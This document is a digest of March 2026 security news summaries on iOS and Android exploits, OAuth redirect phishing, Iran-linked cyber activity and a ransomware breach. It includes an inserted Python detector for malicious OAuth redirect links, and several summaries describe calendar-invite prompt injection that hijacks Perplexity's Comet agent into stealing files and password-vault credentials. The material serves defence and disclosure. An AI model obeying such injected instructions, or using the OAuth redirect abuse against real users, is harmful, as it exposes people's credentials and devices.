Google has identified the Coruna iOS exploit kit, targeting iPhones running iOS 13–17.2.1, utilizing 23 exploits across five chains. The kit is ineffective against the latest iOS version. It has been used in targeted attacks by surveillance vendors and broader campaigns by Chinese threat actors. The exploits include RCE and PAC bypasses, with a payload designed to steal financial information and scan for crypto wallets. Google has shared IOCs and Yara rules to aid in detection and prevention.
2026-03-05 | Infosecurity Magazine: Coruna Exploit Kit Targets Older iPhones in Multi-Stage Campaigns
A sophisticated exploit kit named Coruna targets iPhones running iOS 13.0 to 17.2.1, comprising 5 exploit chains and 23 vulnerabilities to extract financial data. Initially linked to a surveillance vendor and later to Russian espionage group UNC6353, it re-emerged in 2025 with Chinese actor UNC6691 using fake financial sites. Key features include device fingerprinting and bypassing Apple security. The payload, PlasmaLoader, collects financial data and transmits it to attackers. Users are advised to update to the latest iOS or enable Lockdown Mode.
2026-03-05 | CSO Online: Coruna iOS exploit kit moved from spy tool to mass criminal campaign in under a year
Google's threat intelligence researchers report that the Coruna iOS exploit kit has evolved from a tool used by a commercial surveillance vendor to a mass criminal campaign within a year. Initially utilized by a suspected Russian espionage group, it is now in the hands of Chinese cybercriminals. The kit includes five exploit chains made up of 23 exploits targeting iPhones on iOS versions 13.0 to 17.2.1, indicating a thriving market for second-hand zero-day exploits.
2026-03-06 | Ars Technica: Feds take notice of iOS vulnerabilities exploited under mysterious circumstances
The Cybersecurity and Infrastructure Security Agency (CISA) has mandated federal agencies to patch three critical iOS vulnerabilities exploited over 10 months by three hacking groups using the Coruna exploit kit. This kit contains 23 iOS exploits and poses a significant threat to iOS versions 13 to 17.2.1. CISA advises all organizations to patch these vulnerabilities. Coruna features advanced capabilities, including a unique JavaScript framework for device fingerprinting and exploit delivery.
2026-03-09 | The Hacker News: ⚡ Weekly Recap: Qualcomm 0-Day, iOS Exploit Chains, AirSnitch Attack & Vibe-Coded Malware
The Tycoon 2FA phishing-as-a-service operation and the LeakBase data-leak forum were dismantled, disrupting MFA credential phishing and the stolen-data trade. Anthropic discovered 22 vulnerabilities in Firefox, with 14 high-severity. Qualcomm's CVE-2026-21385, a buffer over-read flaw, is exploited in the wild. Google revealed the Coruna exploit kit targeting iOS devices. Transparent Tribe used AI to develop malware against Indian entities. MuddyWater targeted U.S. firms amid geopolitical tensions. A critical flaw in WPEverest's plugin allows rogue admin account creation.
'The attack requires no exploit, no user clicks, and no explicit request for sensitive actions': Experts say Perplexity's AI Comet browser can be hijacked to steal your passwords
Date: 2026-03-03 | Source: TechRadar
Perplexity's AI Comet browser is vulnerable to a zero-click indirect prompt injection flaw, named PleaseFix, discovered by Zenity researchers. This vulnerability allows attackers to exfiltrate passwords and sensitive files through malicious calendar invites without user awareness. The AI cannot distinguish between data and instructions, executing harmful commands embedded in seemingly benign invites. The issue was patched by restricting file:// access, preventing the AI from reading the local filesystem.
'The attack requires no exploit, no user clicks, and no explicit request for sensitive actions': Experts say Perplexity's AI Comet browser can be hijacked to steal your passwords
2026-03-03 | The Register: Until last month, attackers could've stolen info from Perplexity Comet users just by sending a calendar invite
Researchers from Zenity Labs discovered vulnerabilities in Perplexity's Comet browser that allowed attackers to access local files and potentially hijack 1Password accounts via malicious calendar invites. The browser's failure to enforce cross-origin restrictions enabled unauthorized file access. After notifying Perplexity on October 22, 2025, a fix was implemented but was later bypassed. A second patch on February 13, 2026, addressed the issue. 1Password also issued a security advisory to enhance protections.
2026-03-03 | Cyberscoop: Researchers discover suite of agentic AI browser vulnerabilities
Researchers at Zenity Labs identified vulnerabilities in multiple agentic AI browsers, including Perplexity's Comet, allowing attackers to hijack the browser via legitimate-looking calendar invites using prompt injection. This exploitation enables unauthorized access to local file systems and password managers without malware. The vulnerabilities were reported to Perplexity in October 2025, with a final fix issued in February 2026. Prompt injection attacks pose significant challenges for AI integration, as complete elimination of such flaws may be impossible.
2026-03-04 | Help Net Security: The vulnerability that turns your AI agent against you
Zenity Labs disclosed the PleaseFix vulnerabilities affecting agentic browsers like Perplexity Comet, allowing attackers to hijack AI agents, access local files, and steal credentials. The vulnerabilities enable zero-click agent compromise and manipulation of password manager interactions. These exploits leverage autonomous actions within authenticated sessions, exposing sensitive data without user awareness. Perplexity has addressed the underlying issues prior to the public disclosure.
2026-03-04 | Cyber Security News: Perplexity’s Comet Browser Hijacked Using Calendar Invite to Exfiltrate Sensitive Data
A critical vulnerability, dubbed PerplexedBrowser, has been discovered in Perplexity’s Comet browser, allowing a zero-click attack via a poisoned Google Calendar invite. This exploit can exfiltrate local files and credentials, including 1Password data. The attack merges legitimate user requests with hidden malicious payloads, directing the browser to an attacker-controlled site. This is the sixth major flaw since Comet's launch in July 2025. Users are advised to secure password managers and limit agent access to sensitive domains.
2026-03-05 | Hack Read: PleaseFix Flaw Lets Hackers Access 1Password Vault via Comet AI Browser
A security vulnerability named PleaseFix was identified in the Comet AI browser, allowing attackers to hijack the AI assistant via malicious calendar invites. This zero-click attack can steal local files or access a user's 1Password vault, enabling full account takeover. Zenity Labs reported the issue to Perplexity on 22 October 2025, leading to fixes implemented by 13 February 2026. Users must opt-in to new security settings to protect against these risks, highlighting the need for caution with AI-powered browsers.
Iranian Cyber Threat Actor Targets Iraqi Government Officials in AI-Powered Campaign
Date: 2026-03-03 | Source: Infosecurity Magazine
An Iran-nexus cyber threat actor, identified as Dust Specter, targeted Iraqi government officials by impersonating the Ministry of Foreign Affairs using AI tools. Detected in January 2026 by Zscaler ThreatLabz, the campaign involved previously undocumented malware, including SplitDrop, TwinTask, and TwinTalk. The first attack chain used a password-protected RAR file to deliver malware, while the second consolidated functionality into a single binary, employing Google Forms for social engineering and in-memory PowerShell execution.
Iranian Cyber Threat Actor Targets Iraqi Government Officials in AI-Powered Campaign
2026-03-04 | Cyber Security News: Iran‑Nexus APT ‘Dust Specter’ Hits Iraqi Officials with AI‑Assisted Malware and Novel RATs
In January 2026, the Iran-linked APT group Dust Specter targeted Iraqi government officials using AI-assisted malware. The campaign introduced four new malware tools: SPLITDROP, TWINTASK, TWINTALK, and GHOSTFORM. SPLITDROP, disguised as a WinRAR application, decrypted and deployed malware silently. GHOSTFORM posed as a government survey while executing malware. The attack utilized DLL sideloading for persistence and employed AI in code development. Recommendations include application allowlisting and monitoring for suspicious activity.
2026-03-05 | The Hacker News: Dust Specter Targets Iraqi Officials with New SPLITDROP and GHOSTFORM Malware
A campaign attributed to the Iran-linked threat actor Dust Specter targets Iraqi government officials by impersonating the Ministry of Foreign Affairs. Observed by Zscaler ThreatLabz in January 2026, the campaign uses malware including SPLITDROP, TWINTASK, TWINTALK, and GHOSTFORM. The attacks employ sophisticated evasion techniques and command-and-control mechanisms. GHOSTFORM consolidates functionalities into a single binary, utilizing in-memory execution and embedding a Google Forms URL masquerading as an official survey.
2026-03-06 | Security Affairs: Iran-nexus APT Dust Specter targets Iraq officials with new malware
Iran-linked APT Dust Specter is targeting Iraqi officials with phishing emails delivering new malware, including SPLITDROP, TWINTASK, TWINTALK, and GHOSTFORM. The campaign, observed by Zscaler ThreatLabz, uses social engineering tactics, impersonating Iraq’s Ministry of Foreign Affairs. Attack Chain 1 involves a password-protected RAR archive deploying malware, while Attack Chain 2 consolidates functionality into a single binary. Indicators suggest generative AI may have aided in malware development.
Google addresses actively exploited Qualcomm zero-day in fresh batch of 129 Android vulnerabilities
Date: 2026-03-02 | Source: Cyberscoop
Google disclosed an actively exploited zero-day vulnerability, CVE-2026-21385, affecting an open-source Qualcomm display component in Android devices. This memory-corruption flaw impacts 234 chipsets and was reported to Qualcomm on Dec. 18, 2025. Qualcomm issued fixes in January 2026. The March Android security update addresses 129 vulnerabilities, the highest monthly total since April 2018, with two patch levels released. The update includes 63 vulnerabilities in the primary patch and 66 in the secondary patch.
Google addresses actively exploited Qualcomm zero-day in fresh batch of 129 Android vulnerabilities
2026-03-03 | Cyber Security News: Android Security Update – Patch for 129 Vulnerabilities and Actively Exploited Zero-Day
Google's March 2026 Android Security Bulletin addresses 129 vulnerabilities, including a high-severity zero-day (CVE-2026-21385) in Qualcomm Display, currently exploited in targeted attacks. The update includes critical patches for Remote Code Execution (CVE-2026-0006) and Elevation of Privilege vulnerabilities. Users should apply the 2026-03-05 patch level for full protection. Google collaborates with vendors to secure hardware components, and source code patches will be published to AOSP within 48 hours of the bulletin. Google Play Protect continues to monitor threats.
2026-03-03 | The Hacker News: Google Confirms CVE-2026-21385 in Qualcomm Android Component Exploited
Google disclosed CVE-2026-21385, a high-severity buffer over-read vulnerability in a Qualcomm component used in Android devices, exploited in the wild. The flaw, reported on December 18, 2025, has a CVSS score of 7.8. Google’s March 2026 update includes patches for 129 vulnerabilities, including critical flaws like CVE-2026-0006, CVE-2026-0047, and several privilege escalation issues. Two patch levels, 2026-03-01 and 2026-03-05, were provided for Android partners to address vulnerabilities efficiently.
2026-03-03 | Help Net Security: Android’s March 2026 security patch fixes over 100 flaws, one under targeted exploitation
The Android March 2026 security patch addresses over 100 vulnerabilities, including CVE-2026-21385, which is under targeted exploitation and affects Qualcomm Display. Critical vulnerabilities include CVE-2026-0006 (remote code execution) and CVE-2025-48631 (denial of service). The Framework section lists over 30 CVEs, primarily elevation-of-privilege issues. Third-party vendors like MediaTek and Qualcomm contribute significantly to the CVE count. Patches will be available through Google Play for devices on Android 10 and later.
2026-03-03 | Security Affairs: Android devices hit by exploited Qualcomm flaw CVE-2026-21385
Google confirmed the exploitation of Qualcomm vulnerability CVE-2026-21385 (CVSS 7.8) in Android devices, allowing attackers to access sensitive memory data. Google reported the flaw to Qualcomm on December 18, 2025, and Qualcomm notified customers on February 2, 2026. The March 2026 Android update addresses 129 vulnerabilities, including critical flaws like CVE-2026-0006 (CVSS 9.8) for remote code execution. Two patch levels (2026-03-01 and 2026-03-05) were introduced for faster fixes.
2026-03-03 | TechRadar: Google patches 129 Android security flaws — including a potentially dangerous Qualcomm zero-day
Google's March 2026 Android update addresses 129 vulnerabilities, including 10 critical bugs. Notably, CVE-2026-21385, a buffer over-read vulnerability in Qualcomm's Graphics component, has a CVSS score of 7.8, is reportedly exploited in the wild, and affects some 235 Qualcomm chipsets. Two patch levels (2026-03-01 and 2026-03-05) were released, with Pixel devices prioritized for updates. The vulnerabilities could lead to remote code execution, privilege escalation, and DoS attacks.
2026-03-04 | Malwarebytes Labs: High-severity Qualcomm bug hits Android devices in targeted attacks
Google's March 2026 Android Security Bulletin addresses 129 vulnerabilities, including CVE-2026-21385, a high-severity Qualcomm graphics/display flaw actively exploited in targeted attacks. Affected devices include over 230 Qualcomm chipset models, potentially impacting hundreds of millions globally. Users are advised to update to patch level 2026-03-05 or later and follow safety precautions, such as installing apps only from official stores and scrutinizing app permissions to mitigate risks.
OAuth redirection abuse enables phishing and malware delivery
Date: 2026-03-02 | Source: Microsoft Security
Microsoft identified phishing campaigns exploiting OAuth redirection to deliver malware, targeting government and public-sector organizations. Attackers create malicious applications with redirect URIs leading to attacker-controlled domains. Phishing emails used themes like e-signatures and financial matters to entice clicks. The attack involves silent OAuth probes, redirect abuse, and malware delivery via ZIP files containing malicious scripts. Recommendations include governing OAuth applications, enhancing monitoring, and blocking known indicators of compromise.
2026-03-03 | The Register: Phish of the day: Microsoft OAuth scams abuse redirects for malware delivery
Microsoft has reported ongoing OAuth abuse scams targeting government and public-sector organizations, utilizing phishing emails and URL redirects to deliver malware. Attackers exploit OAuth's redirect feature to lead victims to malicious landing pages. Campaigns involve phishing emails with various lures, and attackers use tools to distribute messages. The malicious payloads include ZIP files and LNK shortcuts that execute PowerShell commands, ultimately connecting to external command-and-control endpoints. Microsoft emphasizes the need for ongoing monitoring.
2026-03-03 | The Hacker News: Microsoft Warns OAuth Redirect Abuse Delivers Malware to Government Targets
Microsoft reported phishing campaigns targeting government and public-sector organizations using OAuth URL redirection to deliver malware. Attackers create malicious applications with redirect URLs to rogue domains, tricking users into downloading malware via crafted OAuth links. The malware, distributed as ZIP files, executes PowerShell commands and sideloads a malicious DLL. Emails use themes like e-signature requests to lure victims. Microsoft advises limiting user consent and reviewing application permissions to mitigate risks.
2026-03-03 | Security Affairs: Phishing campaign exploits OAuth redirection to bypass defenses
Microsoft researchers have identified phishing campaigns exploiting OAuth URL redirection to target government organizations. Attackers create malicious OAuth applications to redirect users to attacker-controlled sites, bypassing traditional defenses. By manipulating OAuth parameters, they trigger errors that lead to malware downloads, including ZIP files with LNK shortcuts. Recommendations include governing OAuth applications, limiting user consent, and enhancing identity protection to mitigate risks associated with these identity-based threats.
2026-03-03 | CSO Online: OAuth phishers make ‘check where the link points’ advice ineffective
Microsoft has alerted that phishers are misusing OAuth's redirect feature to lead victims to malware via links appearing to originate from legitimate identity providers like Microsoft Entra ID and Google Workspace. These links, while seemingly safe, redirect users to malicious sites. Microsoft has disabled several malicious OAuth applications but cautions that such phishing campaigns persist and necessitate continuous monitoring.
2026-03-03 | TechRadar: Microsoft warns of OAuth phishing campaigns able to bypass email and browser defenses - says 'these campaigns demonstrate that this abuse is operational, not theoretical'
Microsoft warns of phishing campaigns exploiting the OAuth redirect feature to deliver malware and steal credentials. Attackers send emails themed around Teams recordings or Microsoft 365 resets, redirecting victims to malicious sites. Payloads are delivered via ZIP files containing LNK shortcuts and HTML smuggling, leading to PowerShell commands that connect to external C2 endpoints. Victims do not lose credentials on the OAuth page; the redirect is solely for payload delivery. The extent of the campaign's impact on government organizations remains unclear.
2026-03-03 | Help Net Security: Threat actors weaponize OAuth redirection logic to deliver malware
An ongoing phishing campaign is exploiting OAuth redirection to deliver malware, targeting government and public-sector organizations. Attackers manipulate legitimate OAuth login flows, redirecting users from trusted pages to malicious sites. The campaign begins with deceptive emails leading to authentic-looking OAuth pages, which then redirect to attacker-controlled sites. Microsoft advises organizations to govern OAuth applications, limit user consent, and implement identity protection measures to mitigate risks.
2026-03-03 | Cyber Security News: Microsoft Warns of New Phishing Attack Exploiting OAuth in Entra ID to Evade Detection
A new phishing attack exploiting OAuth in Microsoft Entra ID has been reported, targeting government and public-sector organizations. Attackers use legitimate redirection to bypass defenses, registering malicious applications to redirect users to attacker-controlled domains without stealing tokens. The five-stage attack includes email delivery, silent OAuth probing, error redirects, malware delivery, and endpoint persistence. Microsoft recommends restricting user consent, auditing OAuth registrations, enabling Conditional Access, and monitoring suspicious redirect URIs.
2026-03-04 | Malwarebytes Labs: Attackers abuse OAuth’s built-in redirects to launch phishing and malware attacks
Attackers exploit OAuth error redirects to facilitate phishing and malware attacks, redirecting users from legitimate Microsoft or Google login URLs to malicious sites without stealing tokens. The attack involves deceptive emails prompting users to click links that appear trustworthy. Once clicked, users are redirected to attacker-controlled pages that mimic legitimate sites, leading to credential theft or malware downloads. Recommendations include verifying links, being cautious with unexpected downloads, and keeping security tools updated.
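The detection angle that the Microsoft guidance above (governing OAuth applications, auditing registrations, monitoring suspicious redirect URIs) implies can be shown in a few lines. The following is an added example, not code from Microsoft or from any of the articles summarized here: it parses OAuth authorization-request links out of constructed proxy-log lines and flags those whose redirect_uri points at a domain the organisation does not own. The "silent probe" stage is modelled as a prompt=none request, which is the standard OAuth/OpenID Connect way to demand a non-interactive answer; the page does not say which exact parameters the campaign used, so treat that as an assumption. The identity-provider hosts are real endpoints, but every client_id, user name, trusted domain and log line is made up for the example.

```python
"""
Added example (not code from Microsoft or from any article on this page):
flag OAuth authorization-request links whose redirect_uri points at a domain
the organisation does not own, run over a few constructed proxy-log lines.

The abuse pattern: the phishing link goes to the genuine identity-provider
authorize endpoint, but client_id belongs to an app the attacker registered
with a redirect_uri on their own domain.  Under RFC 6749 the authorization
server delivers error responses by redirecting the browser to redirect_uri
with error= appended, so a request built to fail (modelled here as
prompt=none, which forbids any interactive page) lands the victim on the
attacker's site without ever showing a consent screen.
"""
from urllib.parse import urlsplit, parse_qs, urlencode

# Authorization endpoints whose links users are trained to trust.
IDP_AUTHORIZE_HOSTS = {"login.microsoftonline.com", "login.microsoft.com", "accounts.google.com"}

# Assumption: domains this fictional tenant actually owns.  In production this
# list should be derived from the tenant's own app registrations instead.
TRUSTED_REDIRECT_DOMAINS = {"contoso.example"}

# Constructed proxy-log lines.  Line 1 is a normal SSO login, lines 2 and 3
# reproduce the campaign shape, line 4 is unrelated browsing.
SAMPLE_PROXY_LOG = """\
2026-03-02T09:14:03Z user=alice url=https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=11111111-2222-3333-4444-555555555555&response_type=code&redirect_uri=https%3A%2F%2Fsso.contoso.example%2Fcallback&scope=openid&state=abc
2026-03-02T09:15:41Z user=bob url=https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee&response_type=code&redirect_uri=https%3A%2F%2Fdocs-esign.example.net%2Fview&scope=openid&prompt=none&state=xyz
2026-03-02T09:16:10Z user=carol url=https://accounts.google.com/o/oauth2/v2/auth?client_id=12345.apps.googleusercontent.com&redirect_uri=https%3A%2F%2Fteams-recording.example.org%2Fplay&response_type=code&scope=openid
2026-03-02T09:17:22Z user=dave url=https://www.example.com/news
"""


def _host_owned(host, domains):
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in domains)


def analyze_oauth_link(url):
    """Classify one URL; returns the redirect target plus the reasons it was flagged."""
    parts = urlsplit(url)
    verdict = {"is_authorize": False, "redirect_host": None, "silent": False,
               "suspicious": False, "reasons": []}
    host = (parts.hostname or "").lower()
    last_segment = parts.path.rstrip("/").rsplit("/", 1)[-1]
    if host not in IDP_AUTHORIZE_HOSTS or last_segment not in {"authorize", "auth"}:
        return verdict                      # not an OAuth authorization request
    verdict["is_authorize"] = True
    qs = parse_qs(parts.query)              # percent-decodes redirect_uri for us
    redirect_uri = qs.get("redirect_uri", [""])[0]
    rhost = urlsplit(redirect_uri).hostname
    verdict["redirect_host"] = rhost
    if rhost is None or not _host_owned(rhost, TRUSTED_REDIRECT_DOMAINS):
        verdict["suspicious"] = True
        verdict["reasons"].append("redirect_uri host is not an owned domain")
    if qs.get("prompt", [""])[0] == "none":
        verdict["silent"] = True            # no UI possible: every outcome is a redirect
        verdict["reasons"].append("prompt=none forces a non-interactive redirect")
    return verdict


def idp_error_redirect(authorize_url, error="login_required"):
    """Model the RFC 6749 s4.1.2.1 error path: the IdP answers with a 302 whose
    Location is redirect_uri plus error= (and the caller's state=).  This is the
    'error redirect' stage; the victim's browser ends up at the returned URL."""
    qs = parse_qs(urlsplit(authorize_url).query)
    redirect_uri = qs["redirect_uri"][0]
    params = {"error": error}
    if "state" in qs:
        params["state"] = qs["state"][0]
    sep = "&" if urlsplit(redirect_uri).query else "?"
    return redirect_uri + sep + urlencode(params)


def scan_log(log_text):
    """Return (user, redirect_host, silent) for every suspicious authorize link."""
    flagged = []
    for line in log_text.splitlines():
        if " url=" not in line or " user=" not in line:
            continue
        user = line.split(" user=", 1)[1].split()[0]
        url = line.split(" url=", 1)[1].strip()
        verdict = analyze_oauth_link(url)
        if verdict["suspicious"]:
            flagged.append((user, verdict["redirect_host"], verdict["silent"]))
    return flagged


if __name__ == "__main__":
    for user, rhost, silent in scan_log(SAMPLE_PROXY_LOG):
        print(f"{user}: authorize link bounces to {rhost} (silent={silent})")
```

Two caveats for anyone adapting this. Legitimate third-party SaaS apps also register redirect URIs off the tenant's domains, so an ownership allowlist alone produces noise; the useful rule joins the redirect host against the tenant's consented applications and treats a never-before-seen client_id as the stronger signal. And because the IdP itself never fails in this chain (the redirect is standard, not a bug), mail and URL filters that only check the link's host will keep passing these links, which is exactly why the sources above push application governance and consent restrictions rather than link inspection.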
University of Hawaiʻi Cancer Center confirms data leak following ransomware attack
Date: 2026-03-02 | Source: Recorded Future
The University of Hawaiʻi Cancer Center confirmed a data leak affecting up to 1.2 million individuals due to a ransomware attack on its epidemiology division. Hackers accessed sensitive records, including Social Security and driver’s license numbers, linked to historical voter registrations and health studies. The breach involved 87,493 study participants, with ongoing investigations into additional data exposure. The university engaged with threat actors to mitigate risks and is reviewing IT systems for enhanced security.
2026-03-03 | Security Magazine: 1M Impacted by University of Hawaii Cancer Center Breach
The University of Hawaiʻi Cancer Center's Epidemiology Division reported a data breach affecting approximately 1.15 million individuals, with exposed information including Social Security numbers, driver’s license numbers, and voter registration records. The breach involved files from epidemiological studies dating back to the 1990s. Notifications to affected individuals began on February 23, 2026. Experts emphasize the importance of preventing unauthorized access and maintaining operational resilience against cyberattacks in healthcare.
2026-03-04 | Security Affairs: Data breach at University of Hawaiʻi Cancer Center impacts 1.2 Million individuals
A ransomware attack on the University of Hawaiʻi Cancer Center on August 31, 2025, exposed personal data of approximately 1.2 million individuals. The breach affected research operations, compromising names, Social Security numbers, driver’s license details, and health-related information. The organization has engaged law enforcement and cybersecurity experts for investigation. Affected individuals are offered 12 months of free credit monitoring and identity theft protection services.
2026-03-04 | Hack Read: Ransomware Breach at University of Hawaii Cancer Center Affects 1.2M People
A ransomware attack at the University of Hawaii Cancer Center affected approximately 1.24 million individuals, first detected on 31 August 2025. The breach involved historical records from 1998-2000 and data from 87,493 participants in the Multiethnic Cohort Study, including SSNs and health information. The university decided to pay a ransom for a decryption tool and assurance of data destruction. They offer 12 months of free credit monitoring and $1 million in identity theft insurance. Concerns were raised about the delay in public notification.
Taming Agentic Browsers: Vulnerability in Chrome Allowed Extensions to Hijack New Gemini Panel
Date: 2026-03-02 | Source: Palo Alto
A high-severity vulnerability (CVE-2026-0628) in Chrome's Gemini feature allows malicious extensions to hijack the Gemini panel, enabling unauthorized access to local files, camera, and microphone. Discovered on October 23, 2025, it could facilitate privilege escalation and phishing attacks. Google issued a fix on January 5, 2026. Palo Alto Networks recommends using Prisma Browser to prevent such extension-based attacks and offers advanced protection features to mitigate risks.
2026-03-02 | Cyber Security News: Chrome Gemini Vulnerability Lets Attackers Access Victims’ Camera and Microphone Remotely
A high-severity vulnerability in Google Chrome's Gemini AI assistant, tracked as CVE-2026-0628, allows attackers to remotely access users' cameras and microphones, steal local files, and conduct phishing attacks without user interaction. Discovered by Palo Alto Networks on October 23, 2025, the flaw exploits how Chrome handles the declarativeNetRequest API, granting elevated permissions to malicious extensions. Google released a patch on January 5, 2026. Organizations are urged to update Chrome immediately to mitigate risks.
2026-03-02 | The Hacker News: New Chrome Vulnerability Let Malicious Extensions Escalate Privileges via Gemini Panel
A newly disclosed vulnerability in Google Chrome, tracked as CVE-2026-0628 (CVSS score: 8.8), allowed attackers to escalate privileges via malicious extensions, potentially accessing local files and sensitive data. Patched in January 2026, the flaw stemmed from insufficient policy enforcement in the WebView tag. Discovered by Palo Alto Networks on November 23, 2025, it could enable unauthorized access to the camera, microphone, and screenshots through the Gemini panel, highlighting risks from AI integration in browsers.
2026-03-03 | Security Affairs: Chrome security flaw enabled spying via Gemini Live assistant
A vulnerability in Google Chrome, tracked as CVE-2026-0628, allows malicious extensions to hijack the Gemini Live AI assistant, enabling spying and file theft. Discovered by Palo Alto Networks, the flaw permits extensions with basic permissions to inject JavaScript into the Gemini panel, accessing local files, camera, and microphone without user consent. The vulnerability was responsibly disclosed on October 23, 2025, and patched in early January 2026. This highlights risks associated with AI-integrated browser features.
2026-03-03 | The Register: Chrome Gemini panel became privilege escalator for rogue extensions
A high-severity vulnerability in Google Chrome, tracked as CVE-2026-0628, was discovered by Palo Alto Networks' Unit 42. Malicious extensions could exploit this flaw to hijack the Gemini Live AI panel, gaining unauthorized access to system resources like webcams and local files. Google patched the issue in January with updates 143.0.7499.192 and 143.0.7499.193. The incident highlights risks associated with integrating AI features into core software, as attackers are increasingly leveraging AI in their tools.
2026-03-03 | Malwarebytes Labs: Chrome flaw let extensions hijack Gemini’s camera, mic, and file access
A high-severity vulnerability in Chrome's Gemini panel, tracked as CVE-2026-0628, allowed low-privilege extensions to inject code and gain access to sensitive capabilities like local file access, screenshots, and camera/microphone control. This flaw was patched in January 2026. Users are advised to limit extensions, prefer well-audited ones, and monitor for unusual activity, as the Gemini panel's trusted status could mislead users about its security.
Hacked Prayer App Used as Cyber Weapon During US-Israel Strikes on Iran
Date: 2026-03-02 | Source: Cyber Security News
During US-Israel airstrikes on Tehran, the 'BadeSaba Calendar' prayer app was compromised, sending psychological warfare notifications to millions of Iranian users. Messages urged military personnel to surrender, coinciding with the strikes. Cybersecurity experts view this as a coordinated nation-state operation, though attribution remains unclear. Concurrently, Iran faced severe internet disruptions, with national connectivity dropping to 1% of normal levels, hindering communication and documentation efforts.
2026-03-02 | Security Magazine: Iranian Apps, Websites Hacked Following US-Israeli Strikes
A series of cyber operations targeted Iranian news websites and a popular religious calendar app, BadeSaba, following US-Israeli strikes. Internet connectivity in Iran dropped significantly. The hackers displayed messages on the hacked sites and app, urging armed forces to surrender. Reports suggest that military targets and government services were also affected to disrupt a coordinated national response, though these claims remain unverified.
2026-03-02 | Infosecurity Magazine: Hybrid Middle East Conflict Triggers Surge in Global Cyber Activity
A surge in global cyber activity has been triggered by military strikes in the Middle East, particularly following joint Israeli-US operations against Iran on February 28, 2026. These strikes were accompanied by a significant cyber campaign that disrupted Iran's digital infrastructure, affecting government services and critical sectors. Experts anticipate intensified cyber retaliation from Iran, including DDoS attacks and ransomware. Organizations are advised to enhance security measures, including multi-factor authentication and offline backups, to mitigate risks.
2026-03-02 | Infosecurity Magazine: Expect Iran to Launch Cyber-Attacks Globally, Warns Google Head of Threat Intel
Iran is expected to launch cyber-attacks globally in response to US and Israeli air strikes, according to John Hultquist of Google Threat Intelligence. The focus has shifted from Israel to other Gulf Cooperation Council countries, which may have less mature security. Hultquist warns of blurred lines between Iranian state actors and cybercriminals, predicting attacks disguised as hacktivism or ransomware. The National Cyber Security Centre advises organizations with Middle East operations to review their cybersecurity posture due to heightened risks.
2026-03-02 | Cybersecurity Dive: Iran-linked hackers raise threat level against US, allies
Security researchers warn of increased cyber threats from Iran-linked hackers following U.S. and Israeli military actions. These groups are ramping up reconnaissance and DDoS attacks, targeting critical infrastructure in the U.S., Israel, and Gulf Cooperation Council countries. Specific threats have been made against the financial services sector. The UK National Cyber Security Centre advises businesses to enhance security measures due to the heightened risk of hacktivist attacks amid regional tensions.
2026-03-02 | The Register: UK businesses told to brace cyber defenses amid Iran conflict risk
The UK's National Cyber Security Centre (NCSC) warns businesses to enhance cyber defenses amid escalating Middle East tensions. While no significant direct threat from Iran exists currently, indirect threats are likely for organizations linked to the region. The NCSC advises firms to review security basics, tighten access controls, and sign up for its Early Warning service. Security experts anticipate an increase in Iranian cyber activity, including potential targeting of critical infrastructure and networks.
2026-03-02 | Security Affairs: Middle east crisis prompts UK NCSC warning on potential Iranian cyber activity
The UK’s NCSC issued a warning on March 2, 2026, regarding potential Iranian cyber threats due to rising Middle East tensions. While no immediate threat to the UK is noted, organizations with regional operations are urged to enhance defenses against possible indirect threats. Recommendations include reviewing DDoS and phishing guidance, strengthening security postures, and enrolling in the NCSC's Early Warning service. CrowdStrike reports Iran-linked hackers are already conducting DDoS and reconnaissance activities.
2026-03-02 | The Register: Iran's cyberwar has begun
Iranian hackers have intensified cyber operations, including DDoS attacks and malware staging, following recent US and Israeli missile strikes. Targeting Israel and Gulf nations, the Iranian group Cotton Sandstorm has resumed activities, deploying infostealers and ransomware. Analysts warn US-linked organizations, especially defense contractors, should heighten security. Disinformation campaigns are also prevalent, complicating the threat landscape. Organizations are advised to patch systems and enhance security training.
2026-03-03 | Sophos: Hacktivist campaigns increase as United States, Iran, and Israel conflict intensifies
Increased Iranian hacktivist activity has been observed following U.S. and Israeli military strikes on Iran on February 28, 2026. Groups like Handala Hack Team and APTIran are inciting cyberattacks against Israeli targets, utilizing tactics such as DDoS and doxxing. The BaqiyatLock ransomware group is offering free memberships to hacktivists. Organizations, especially in the U.S. and Middle East, are advised to enhance defenses, patch known vulnerabilities, and maintain robust monitoring practices to mitigate risks.
2026-03-03 | Cisco Talos: Update, March 10: Talos on the developing situation in the Middle East
Cisco Talos is monitoring the ongoing Middle East conflict, noting minor cyber incidents like web defacements and DDoS attacks. Historically, Iranian groups engage in espionage and destructive attacks. Recommendations for organizations include enabling multi-factor authentication, being cautious with unsolicited links, and assessing third-party risks. Employees should be warned about potential "hacktivist" lures, and organizations should enhance their cybersecurity hygiene and patch management to mitigate risks.
2026-03-03 | Palo Alto: Threat Brief: March 2026 Escalation of Cyber Risk Related to Iran
On Feb. 28, 2026, following U.S. and Israeli military operations, Iran's internet connectivity plummeted to 1-4%, limiting state-aligned cyberattack capabilities. Hacktivist groups, including Handala Hack and APT Iran, have increased disruptive operations against perceived adversaries. A phishing campaign using a fake Israeli app was identified, alongside social engineering scams in the UAE. Pro-Russian groups also targeted Israeli systems. Recommendations include enhancing data protection, employee training, and maintaining updated security measures.
2026-03-03 | DIGIT: NCSC Warns UK Business to Prepare for Iranian Cyber-attacks
The National Cyber Security Centre (NCSC) warns UK businesses to enhance cyber defenses amid the ongoing Middle East conflict, which may lead to indirect cyber threats from Iranian state actors. While no immediate threat is noted, organizations with ties to the region should adjust their cybersecurity posture, monitor for DDoS attacks, phishing, and ICS targeting. The NCSC advises signing up for its Early Warning service and reviewing guidance for critical national infrastructure in light of potential cyber threats.
2026-03-03 | Cyber Security News: Epic Fury/Roaring Lion Sparks Escalating Cyber Conflict as Iran Goes Offline, Hacktivists Step Up Retaliation
On February 28, 2026, the U.S. and Israel initiated Operation Epic Fury and Operation Roaring Lion, leading to a significant cyber conflict with Iran. Iran's internet access plummeted to 1-4%, disrupting its cyber units. A phishing campaign mimicking the Israeli RedAlert app was identified, while hacktivist groups surged, targeting Israeli and Western assets. The "Electronic Operations Room" coordinated attacks, including DDoS and infrastructure compromises. Recommendations include offline data storage and employee training on phishing.
2026-03-03 | TechCrunch: Hacked traffic cams and hijacked TVs: How cyber operations supported the war against Iran
